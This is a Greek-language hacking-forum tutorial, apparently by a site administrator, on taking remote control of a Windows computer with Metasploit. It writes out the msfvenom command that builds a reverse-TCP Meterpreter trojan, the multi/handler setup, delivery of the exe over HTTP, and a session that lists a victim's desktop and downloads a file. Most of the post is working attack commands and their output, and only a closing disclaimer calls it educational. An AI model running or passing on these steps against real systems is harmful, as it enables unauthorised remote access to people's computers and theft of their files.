Μετάβαση στο περιεχόμενο
  • ChatBox

    ChatBox

    Chatroom Rules

    • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
    • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
    • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
    • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
Mata

Πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή

Recommended Posts

Mata
Διαχειριστής

Καλησπέρα. Σήμερα θα δούμε πως να πάρουμε απομακρυσμένη πρόσβαση σε Windows συσκευή από metasploit. Αρχικά θα ανοίξουμε το msfvenom για να δημιουργήσουμε το trojan το οποίο θα μας δώσει την πρόσβασηmsfvenom.thumb.PNG.484ecd8e83a9cc4f856b37093de12735.PNG

 


 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.161.68 LPORT=4444 -f exe > greekhacking.exe

-p = payload

-LHOST: localhost

LPORT: local port

-f: file

 

Για να δούμε την ip μας και να την περάσουμε στο lhost, κάνουμε ifconfig σε ένα άλλο τερματικό.

 

Αφού φτιάξουμε trojan, ανοίγουμε το metasploit (msfconsole)

msfconsole.thumb.PNG.9d55f9f989cffe5740a884e18f2cd43d.PNG

 

Αφού ανοίξει πληκτρολογούμε 

use multi/handler

multihandler.thumb.PNG.ed8ddd7a739c5d0cdc228955103e2992.PNG

 

Αμέσως μετά βάζουμε payload. 

set PAYLOAD windows/x64/meterpreter/reverse_tcp

 

payload.thumb.PNG.92ac062109f16eb75b4b1836ed749380.PNG

 

Αφού βάλουμε και payload πατάμε show options για να δούμε τις επιλογές μας.

lhost.thumb.PNG.a4a903aeae6aecb20b2bbd059bdb0f57.PNG

 

Βλέπουμε ότι είναι κενό το lhost οπότε πάμε πάλι στην εντολή ifconfig για να το περάσουμε. Οπότε πατάμε "set LHOST <ip>".

Να πω επίσης ότι αν το LPORT σας είναι default αλλάξτε το ανάλογα με το τι βάλατε στο msfvenom πληκτρολογόντας "set LPORT <PORT>".

Τώρα θα πάμε σε ένα άλλο τερματικό έτσι ώστε να ανοίξουμε server για να μπορέσουμε να κάνουμε την επίθεση. Πάμε σε τερματικό και πληκτρολογούμε αυτό

1966208756_server.thumb.PNG.80fb744eec78b397f9f97b4b7255d644.PNG

Όταν λοιπόν είμαστε έτοιμοι, γράφουμε την εντολή exploit στο τερματικό μας

exploit.thumb.PNG.4f30dc79db6341aafb9bc179f9763e45.PNG

 

Τώρα το metasploit περιμένει αντίδραση από τον χρήστη έτσι ώστε να μας δώσει πρόσβαση. Πάμε να την πάρουμε. Πάμε στα windows στην πορκειμένη περίπτωση που είμαι local, και κατεβάζουμε το αρχείο.

http://<ip>/greekhacking.exe (όπως ονόμασα το αρχείο στο msfvenom)

και αμέσως μετά το τρέχουμε και βλέπουμε παρακάτω πως όταν το ανοίγουμε το metasploit αντιδρά και αυτό και μας δίνει πρόσβαση

ezgif.com-gif-maker.gif.c214a54b401a16eb9e113e5f1dd51a6e.gif

 

(Συγγνώμη αν δεν πίασει το gif)

 

Αφού μας δώσει την πρόσβαση μπορούμε να γράψουμε την εντολή help για να δούμε τα commands που μπορούμε να χρησιμοποιήσουμε. Στην περίπτωσή μου απλά θα πάω στο path C:\\Users\User\Desktop και θα κάνω ls για να δω τα αρχεία στο desktop του χρήστη

dir.PNG.f68e347f57e4b2a2f4184c7bb709af05.PNG

 

desktop.thumb.PNG.543b94562be422424d235cbfcb63926d.PNG

 

Εδώ είναι το desktop (επιφάνεια εργασίας). Πάμε να δούμε τι έχει μέσα το αρχείο greekhacking.txt και να το "υποκλέψουμε".

Για να το κάνουμε αυτό πατάμε download greekhacking.txt

downloadfile.thumb.PNG.45740f608d7ffd0b1fee65ed78ab5458.PNG

 

Κατέβηκε. Πάμε στο path /home/mata/ για να ανοίξουμε το αρχείο με vi έτσι ώστε να το δούμε

vi.PNG.af3b3adcf72a8e2ca1ba25d7b6ec8f28.PNG

 

openfile.thumb.PNG.03307c3dbcd3b506a2475d348231769c.PNG

 

Ανοίγουμε το αρχείο και βλέπουμε πως έχει μέσα αυτό ακριβώς. Πάμε και στην συσκευή του θύματος να δούμε πως είναι το αρχείο

 

windows.thumb.PNG.86f7256723bfbbaed7c4cf1438458e51.PNG

 

Ακριβώς το ίδιο!

 

Αυτό ήταν λοιπόν το tutorial για σήμερα, ήταν ΜΟΝΟ για εκπαιδευτικούς σκοπούς και δεν φέρω καμία ευθύνη

---------------------------------------------------------------------------------------------------------------

Buy Me A Coffee: https://www.buymeacoffee.com/mataroot

Συνδρομή: https://www.buymeacoffee.com/mataroot/membership

Discord Server: https://discord.gg/aStuy26X

 

 

 

 

Edited by Mata
 
 
 
dfIK0AV.png.e234aa2149c2b74e2ca0b56e57705d64.png

 

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Απάντηση στο θέμα...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...